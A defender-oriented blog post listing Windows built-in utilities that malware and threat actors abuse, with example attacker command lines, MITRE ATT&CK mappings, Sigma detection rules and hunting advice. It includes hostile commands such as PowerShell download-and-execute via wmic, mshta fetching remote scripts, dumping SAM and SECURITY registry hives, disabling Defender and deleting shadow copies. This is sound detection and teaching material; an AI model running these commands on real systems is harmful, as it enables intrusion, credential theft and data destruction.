Common Tools & Techniques Used By Threat Actors and Malware — Part I
If you’ve been keeping up with the information security world even for a little bit, you’ve certainly heard of the recent supply chain attack that occurred in the Solar Wind Orion product. A truly sophisticated attack that showed what a determined group with a lot of patience and skills can do.
A lot of research has been done on the techniques and tactics used by the “SUNBURST” backdoor and a lot of blog posts have been published describing it in extreme details.
But one of the recent blog posts by CrowdStrike dubbed “SUNSPOT: An Implant in the Build Process”, That details how the threat actors were able to inject the “SUNBURST” backdoor into the source code of the SolarWinds Orion IT management product.
While the blog in itself is a fascinating read that you must definitely check out. One thing that “surprised” me was the usage of two techniques.
The first one is the persistence using the scheduled tasks utility and the second is the log file dropped to disk (C:\Windows\Temp\) in a typical malware fashion.
This got me thinking, that if even the most sophisticated of attackers still uses such techniques and utilities. Then, there is always hope to catch them.
So in this blog post i thought i’ll write about the most common techniques, utilities and command lines arguments used by malware and threat actors in the recent years.
For this I've went back and read about 60 recent blog posts and write-ups from “fireeye”, “thedfirreport”, “crowdstrike”, “redcanary”, “checkpoint” to name a few. And searched for the most recently uploaded malware to sites such as “any.run”, “hybrid-analysis”, “inquest” and “tria.ge”.
Note: This first part of this two part series will focus mostly on the tools and their command line arguments. Techniques such as process injection, process hollowing, named pipes…etc. will be discussed in the second part.
Windows Utilities (LoLBins)
This will come as a shock to absolutely no one. windows utilities are one of the most widely used tools by malware and threat actors. From discovery and lateral movement to persistence. Below is the list of the most common ones in recent years in no particular order.
Nltest (nltest.exe)
Network Location Test — List domain controllers(DCs), Force a remote shutdown, Query the status of trust, test trust relationships and the state of domain controller replication. — ss64
As described above this tools is often used by threat actors to enumerate active directory trust with “domain_trust” and the domain controllers with “dclist”
The most common arguments are the following:
- /DOMAIN_TRUSTS — Query domain trusts on <ServerName>
- /DCLIST:<DomainName> — Get list of DC’s for <DomainName>
nltest /domain_trusts
nltest /domain_trusts /all_trusts
nltest /dclist:"[DOMAIN]"Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
- T1482 — Domain Trust Discovery
- T1018 — Remote System Discovery
- T1016 — System Network Configuration Discovery
SIGMA Rules
You can detect this tool using the following sigma rules:
- win_trust_discovery.yml
Schtasks (schtasks.exe)
Enables an administrator to create, delete, query, change, run, and end scheduled tasks on a local or remote computer — MSDN
Used by malware and threat actors as a mean of persistence on a system. Below are the most common arguments and their meanings.
- /create : Creates a schedule task.
- /tn (task name) : A value that specifies a name which uniquely identifies the scheduled task.
- /sc (schedule) : A value that specifies the schedule frequency. Valid values are: MINUTE, HOURLY, DAILY, WEEKLY, MONTHLY, ONCE, ONLOGON, ONIDLE, and ONEVENT.
- /mo (modifier) : A value that refines the schedule type to allow for finer control over the schedule recurrence. Valid values are:
- /tr (taskrun) : A value that specifies the path and file name of the task to be run at the scheduled time.
- /ru (runasuser) : A value that specifies the user context under which the task run.
- /run : Used to immediately run a scheduled task.
- /f (force) : A value that forcefully creates the task and suppresses warnings if the specified task already exists.
- /rl (level) : A value that sets the run level for the task. Valid values are LIMITED and HIGHEST. The default is LIMITED.
- /st (starttime) : A value that specifies the start time to run the task. The time format is HH:mm (24-hour time).
- /XML (xmlfile) : A value that creates a task from an XML file
- /delete : Deletes a schedule task
- /S : A value that specifies the remote computer to connect to. If omitted, the system parameter defaults to the local computer.
- /end: Stop a running scheduled task.
Here are a couple of example of how malware / threat actors executed this utility.
SCHTASKS /create /tn [TASK NAME] /sc HOURLY /mo 1 /tr "cmd /c sc config [Service Name] start=AUTO&net start [Service Name]" /ru "NT AUTHORITY\SYSTEM" & SCHTASKS /run /tn [TASK NAME]schtasks /create /tn [TASK NAME] /tr "C:\Windows\system32\mshta.exe C:\ProgramData\malicious.hta" /sc onlogon /ru System /fschtasks.exe /Create /SC MINUTE /TN [TASK NAME] /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -File C:\Users\Administrator\redacted.ps1" /MO 30 /Fschtasks /CREATE /SC ONSTART /TN [TASK NAME] /TR "'C:\Users\redacted.exe'" /fschtasks /CREATE /SC ONCE /ST 17:21:58 /TN [TASK NAME] /TR "'C:\Users\redacted.exe'" /f /RL HIGHESTschtasks.exe /CREATE /XML C:\Windows\TEMP\redacted.xml /TN [TASK NAME] /FSCHTASKS /Delete /TN * /Fschtasks /tn [TASK NAME] /endschtasks /create /tn [TASK NAME] /tr "c:\windows\temp\redacted.bat" /sc ONCE /st 00:00 /F /RU System /S [Remote Host]
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
SIGMA Rules
You can detect this tool using the following sigma rules:
- win_susp_schtask_creation.yml
- win_rare_schtask_creation.yml
- win_powersploit_empire_schtasks.yml
Wmic (wmic.exe)
The WMI command-line (WMIC) utility provides a command-line interface for Windows Management Instrumentation (WMI) — MSDN
Attackers use this utility in a lot of different ways. You can kill processes, search for process, delete shadow copies, execute processes locally or remotely and so forth (its practically limitless). Here are just a couple of example on how this utility is often used
wmic /node:"Remote @IP" process call create "Malicious File"wmic process where "name like '%$process%'" deletewmic.exe shadowcopy deletewmic process where ExecutablePath='Path to executable' deletewmic /NODE:"COMPUTER NAME" /USER:"username" /PASSWORD:"password" process call create "powershell.exe -Command {IEX (New-Object Net.Webclient).DownloadString('http://@IP/redacted.ps1')}"wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"wmic os get /FORMAT:"https[:]//example[.]com/evil[.]xsl"
Note that WMI is used quite often by threat actors and malware. “WMIC” is only half of the story. You can do magical stuff with WMI and powershell.
I highly encourage you to read more on this and the recent attacks using WMI.
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
- T1518.001 — Software Discovery: Security Software Discovery
- T1490 — Inhibit System Recovery
- T1047 — Windows Management Instrumentation
- T1220 — XSL Script Processing
- T1078.003 — Valid Accounts: Local Accounts
- T1057 — Process Discovery
SIGMA Rules
Depending on the context of the execution you can use multiple sigma rules to detect the usage of “wmic”, below are a couple of examples:
- win_susp_wmi_execution.yml
- win_xsl_script_processing.yml
- win_susp_eventlog_clear.yml
Net (net.exe)
The Net.exe Utility component is a command-line tool that controls users, groups, services, and network connections. — MSDN
This utility can be used to view shares, create users and groups, discovery, view password policy…etc. Here are a couple of commands executed by threat actors and malware :
net usernet group "domain admins" /domainnet group "enterprise admins" /domainnet group "Domain Users" /domainnet viewnet view /all /domainnet /stop [Service] /ynet sharenet usersnet usenet use q: \\DomainController\DomainName /user:DomainName\administrator [Password]net config workstationnet localgroup usersnet localgroup /domain
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
- T1087.001 Account Discovery: Local Account
- T1087.002 Account Discovery: Domain Account
- T1136.001 Create Account: Local Account
- T1136.002 Create Account: Domain Account
- T1070.005 Indicator Removal on Host: Network Share Connection Removal
- T1135 Network Share Discovery
- T1201 Password Policy Discovery
- T1069.001 Permission Groups Discovery: Local Groups
- T1069.002 Permission Groups Discovery: Domain Groups
- T1021.002 Remote Services: SMB/Windows Admin Shares
- T1018 Remote System Discovery
- T1049 System Network Connections Discovery
- T1007 System Service Discovery
- T1569.002 System Services: Service Execution
- T1124 System Time Discovery
Sc (sc.exe)
Communicates with the Service Controller and installed services — MSDN
Used by attackers to disable, create, delete or stop services. Below are the most common arguments.
- Create : Creates a subkey and entries for a service in the registry and in the Service Control Manager database.
- Config : Modifies the value of a service’s entries in the registry and in the Service Control Manager database.
- Delete : Deletes a service subkey from the registry. If the service is running or if another process has an open handle to the service, the service is marked for deletion
- Stop : Sends a STOP control request to a service.
sc config [Service] start= Disabledsc config [Service] binPath= "Malicious Command"sc delete [Service]sc start [Service] sc stop [Service]sc create [Redacted] binPath="Path" DisplayName= "Redacted" start= auto
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
- T1543.003 — Create or Modify System Process: Windows Service
- T1569.002 — System Services: Service Execution
SIGMA Rules
You can detect this tool using the following sigma rules:
- win_using_sc_to_change_sevice_image_path_by_non_admin.yml
- win_susp_service_path_modification.yml
- win_service_stop.yml
- win_new_service_creation.yml
- win_multiple_suspicious_cli.yml
BCDEdit (bcdedit.exe)
BCDEdit is a command-line tool for managing Boot Configuration Data stores — MSDN
Often used by ransomware to disable recovery features.
bcdedit /set {default} recoveryenabled Nobcdedit /set {default} bootstatuspolicy ignoreallfailuresbcdedit /set {current} safeboot minimalbcdedit /f /delete {bootmgr}bcdedit /set {globalsettings} advancedoptions falsebcdedit.exe /import "C:\Users\redacted\redacted.txt" /clean
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
SIGMA Rules
You can detect this tool using the following sigma rules:
Mshta (mshta.exe)
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files — Wikipedia
Often seen at early stages of infection as a child of an office executable or WINRAR…etc. But can be seen as mechanism to bypass a whitelist or application control.
mshta.exe [URL] /fmshta.exe ""about:<hta:application><script>[Malicious Content]</script>"mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
SIGMA Rules
You can detect this tool using the following sigma rules:
Rundll32 (rundll32.exe)
As the name suggest, the “rundll32.exe” executable is used to “RUN DLL’s” or Dynamic Link Libraries. I’ve blogged about it in the past so go check it out to get a better understanding of the how the tool work.
In short this utility can be used to executed malicious DLL’s, hijacked COM Server, JavaScript or even executed DLL’s remotely from a share. The LOLBAS project has some great examples.
In the wild you’ll see often DLL execution where the DLL in question is a cobalt strike payload. It goes something like this:
rundll32 [Malicious DLL], [Exported Function]rundll32 [Malicious DLL], #[Exported Function by Ordinal]
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
SIGMA Rules
You can detect this tool using the following sigma rules:
- win_process_dump_rundll32_comsvcs.yml
- win_susp_rundll32_activity.yml
- win_susp_rundll32_by_ordinal.yml
- win_susp_wmic_proc_create_rundll32.yml
Attrib (attrib.exe)
Displays, sets, or removes attributes assigned to files or directories — MSDN
Often used by malware to hide a file or a folder.
attrib +h [File / Folder]attrib +s +h [File / Folder]
SIGMA Rules
You can detect this tool using the following sigma rules:
Reg (reg.exe)
Reg is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. — MITRE ATT&CK
Used by attackers as a mean to persist on a system by adding or modifying keys, as a query mechanism to check if certain configurations or software are installed and as mechanism to dump credentials.
Here are the most common parameters of this utility used by attackers:
- ADD : Adds a new subkey or entry to the registry.
- SAVE : Saves a copy of specified subkeys, entries, and values of the registry in a specified file.
- QUERY : Returns a list of the next tier of subkeys and entries that are located under a specified subkey in the registry.
- DELETE : Deletes a subkey or entries from the registry.
Since the usage of this utility is simple (you can look it up in MSDN), what’s interesting to look at from a command line perspective are the registry keys that the attackers or malware is trying to modify, dump or write to. For that i’ll simply say google it and you’ll find an article about it. Below are some of the most common ones.
reg.exe save hklm\security [PATH]reg save hklm\system [PATH]reg save hklm\sam [PATH]reg ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "[NAME]" /t REG_SZ /F /D "[COMMAND]"reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /freg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "3" /freg save HKLM\SYSTEM\CurrentControlSet\Control\LSA\Data [Path] /yreg save HKLM\SYSTEM\CurrentControlSet\Control\LSA\GBG [Path] /yreg save HKLM\SYSTEM\CurrentControlSet\Control\LSA\Skew1 [Path] /yreg save HKLM\SYSTEM\CurrentControlSet\Control\LSA\JD [Path] /y
The list can be a blog post on its own. I encourage you take a look at the resources i’ll link at the end of this blog to see more registry keys in action.
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
- T1112 — Modify Registry
- T1012 — Query Registry
- T1552.002 — Unsecured Credentials: Credentials in Registry
SIGMA Rules
You can detect this tool using the following sigma rules:
Whoami (whoami.exe)
Displays user, group and privileges information for the user who is currently logged on to the local system — MSDN
Here are the most common flags / parameters that are used in malware or by threat actors:
- /upn : Displays the user name in user principal name (UPN) format.
- /user : Displays the current domain and user name and the security identifier (SID).
- /groups : Displays the user groups to which the current user belongs.
- /priv : Displays the security privileges of the current user.
- /all : Displays all information in the current access token, including the current user name, security identifiers (SID), privileges, and groups that the current user belongs to.
whoami
whoami /all
whoami /groups
whoami /priv
whoami /user
whoami /upnAssociated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
- T1033 — System Owner/User Discovery
- T1059.003 — Command and Scripting Interpreter: Windows Command Shell
SIGMA Rules
You can detect this tool using the following sigma rules:
Systeminfo (systeminfo.exe)
Displays detailed configuration information about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties (such as RAM, disk space, and network cards) — MSDN
Used by malware and threat actors as a mean of discovery. The most common form you’ll find this in a log, is simply “systeminfo.exe”. But it can also be executed remotely with the “/s” flag.
systeminfo.exe
systeminfo /s [Remote Computer]Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
SIGMA Rules
You can detect this tool using the following sigma rules:
Arp (arp.exe) & Ping (ping.exe)
ARP : Displays and modifies entries in the Address Resolution Protocol (ARP) cache — MSDN
The ARP command most often used with “-a” argument to display the ARP table on a system.
PING : Verifies IP-level connectivity to another TCP/IP computer by sending Internet Control Message Protocol (ICMP) echo Request messages — MSDN
The ping command often used as a discovery mechanism to see if machines are UP or a delay mechanism before executing a command.
Below are example of both of these utilities being executed by malware or threat actors:
arp -a
ping -n [Number Of Pings] -4 @IP
ping localhost -n 5 && del [Path to executable]
ping [DOMAIN CONTROLLER]
ping @IP -n 1 -w 5000
ping 0x7f000001 -n 5 -w 10000Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
SIGMA Rules
You can detect this tool using the following sigma rules:
Taskkill (taskkill.exe)
Ends one or more tasks or processes. Processes can be ended by process ID or image name — MSDN
As the name suggest, this utility is used to terminate processes running. Often used by malware or threat actors to make sure that other processes such as Backup software or AV software don’t interfere with their work.
The two most often command line arguments are :
- /im : Specifies the image name of the process to be terminated. Use the wildcard character (
*) to specify all image names. - /f : Specifies that processes be forcefully ended. This parameter is ignored for remote processes; all remote processes are forcefully ended.
So the command-line often executed by malware is the following :
taskkill /im [Executable] /fAssociated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
SIGMA Rules
You can detect this tool using the following sigma rules:
ICacls (icacls.exe)
Displays or modifies discretionary access control lists (DACLs) on specified files, and applies stored DACLs to files in specified directories. — MSDN
Often used by malware and ransomware to change and modify directories and files permissions.
Either by granting full permissions on files and folder in the case of ransomware, which is generally one of the last steps before launching the encryption operation. Or by removing all access to a folder or file in order to create a persistence.
Below are the most common arguments and their meanings:
- /T : Traverse all subfolders to match files/directories.
- /C : Continue on file errors.
- /L : Perform the operation on a symbolic link itself, not its target.
- /Q : Quiet supress success messages.
- /grant user:permission : Grant access rights
- /deny user:permission : Explicitly deny the specified user access rights.
- “:F” (Full Access) / “:R” (Read-Only)
Here are a couple of examples of how malware uses this in action :
icacls [Disk Partition]:\* /grant Everyone:F /T /C /Qicacls [Path To File/Folder] /deny *S-1-1-0:Ricacls [Path to Folder/File] /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"icacls [Path To File/Folder] /deny *S-1-1-0:(OI)(CI)(DE,DC)
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
SIGMA Rules
You can detect this tool using the following sigma rules:
Vssadmin (vssadmin.exe)
Displays current volume shadow copy backups and all installed shadow copy writers and providers — MSDN
This utility is often used by ransomware to delete disk shadow copies from a computer to prevent any restoration. The most common command line arguments are the following:
vssadmin delete shadowsvssadmin delete shadows /allvssadmin delete shadows /all /quietvssadmin resize shadowstorage
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
SIGMA Rules
You can detect this tool using the following sigma rules:
Open Source / Third Party Tools
Other than windows binaries, attackers use some open source / third party tools to perform their attacks. Below are some of the tools that are used by attackers
Note: This is by no means an extensive list, these are the most common tools I’ve found while reading these blog posts and looking at sandbox reports.
You’ll notice that I've omitted utilities like PowerShell, WScript, Regsvr32, Dllhost…etc. These are still highly prevalent and used in attacks. I hope that you the reader will be intrigued enough to look up some of the resources i’ll link below and do more research.
Detection / Threat Hunting Opportunities
Now that we’re familiar with some of the utilities used by malware and threat actors you’ll want to start writing rules or using open source ones to detect them. Whether you’re engineering a detection or hunting for a threat here a the things that you should look for and keep in mind.
Baseline your environment
Before you start writing rules and triggering alerts, you need to remember that most of the rules out there are not designed to be specific to an environment, but rather they are specific to a threat or a technique. This means that when you’re writing or implementing a rule, don’t take it at face value. Always adapt it to your environment by base-lining the behavior of the users in it. We all have that one administrator with the “greatest” of ideas.
Registry Keys Modification / Creation
Most of the malware and threat actors if not all interact with the registry in some form or another for multiple reason.
A good idea is to always keep an eye at registry keys interaction by creating rules that monitor specific keys with different threat scores.
Even if you can’t afford to do research on the different registry keys. The internet is full of blog posts and research describing what the current malware and threat actors are using.
Execution In Succession
Most of the tools mentioned in this blog are used in a daily basis in some environments by administrators and scripts. If you write a rule that triggers each time one is used, you’re in for a hell of a night of false positives.
In the case of utilities like these always consider the time-frame between execution. Take the example below:
whoami & hostname & ipconfig /all & net user /domain 2>&1 & net group /domain 2>&1 & net group “domain admins” /domain 2>&1 & net group “Exchange Trusted Subsystem” /domain 2>&1 & net accounts /domain 2>&1 & net user 2>&1 & net localgroup administrators 2>&1 & netstat -an 2>&1 & tasklist 2>&1 & sc query 2>&1 & systeminfo 2>&1 & reg query “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default” 2>&1Running “whoami”, “hostname”, “ipconfig /all”, “net user /domain”…etc. In a row is very unlikely.
Command Line Arguments
The whole point of this blog post was to familiarize the non initiated (including myself) with the utilities that are being used by malware in the recent years and the command line arguments. So if you take anything from this
ALWAYS INVESTIGATE THE COMMAND LINE OF A PROCESS
Uncommon Child / Parent Relationship
The first thing that a threat actor or a malware needs to do before executing is reach its target and for that an entry point is required.
Whether its an email attachment or what have you. The malware needs to trick the user (except in the case of a vulnerability that doesn’t need user interaction) into executing something.
So at some point in time we’ll have a “legitimate” process like “word.exe” spawning another process that’ll execute the malicious code like “powershell.exe”. This notion of “legitimate” child processes will require some knowledge of the OS that you’re hunting against and its required to catch evil.
Conclusion
We’ve taken a look in this first part at some of the most common windows utilities and open source tools used by malware in the recent years. We’ve also covered some ideas for detection and hunting.
Thanks for reading. If you have any question or addition to this hit me on twitter @nas_bench
Resources
- https://thedfirreport.com/
- https://redcanary.com/blog/
- https://attack.mitre.org/
- https://www.fireeye.com/blog.html
- https://research.checkpoint.com/
- https://lolbas-project.github.io/
- https://docs.microsoft.com/en-us/
- https://any.run/
- http://tria.ge/
- https://www.hybrid-analysis.com/
- https://cyberpolygon.com/materials/
- https://www.crowdstrike.com/blog/
- https://labs.inquest.net/
- https://symantec-enterprise-blogs.security.com/blogs/
- https://www.microsoft.com/security/blog/
